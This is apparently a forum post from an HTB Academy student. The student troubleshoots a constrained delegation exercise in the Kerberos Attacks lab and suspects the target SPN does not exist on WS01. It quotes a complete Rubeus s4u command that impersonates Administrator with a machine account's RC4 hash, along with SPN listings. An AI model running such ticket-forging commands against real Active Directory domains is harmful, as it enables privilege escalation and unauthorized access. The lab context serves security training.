Hello to all!
I find an error in KERBEROS ATTACKS module or maybe I get something wrong. In the Constrained Delegation Overview & Attacking from Windows section (Login To HTB Academy & Continue Learning | HTB Academy) there is a practice question.
I successfully extract the hash of dmz01$ and was able to check it correctness with Rubeus. But I can’t successfully exploit constrained delegation attack with command (it even present in solutions)
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:81322a06e7a6d0f8764531bc8c52fa66 /ptt
I think this is because there is no such SPN record (www/WS01.inlanefreight.local) on host ws01
Registered ServicePrincipalNames for CN=WS01,CN=Computers,DC=INLANEFREIGHT,DC=LOCAL:
WSMAN/WS01
WSMAN/WS01.INLANEFREIGHT.LOCAL
TERMSRV/WS01
TERMSRV/WS01.INLANEFREIGHT.LOCAL
RestrictedKrbHost/WS01
HOST/WS01
RestrictedKrbHost/WS01.INLANEFREIGHT.LOCAL
HOST/WS01.INLANEFREIGHT.LOCAL
And only this SPN is present in the msds-allowedtodelegateto of dmz01$ (www/WS01.INLANEFREIGHT.LOCAL, www/WS01).
Is it an error in the lab (delegation to unexisting SPN) or I miss something?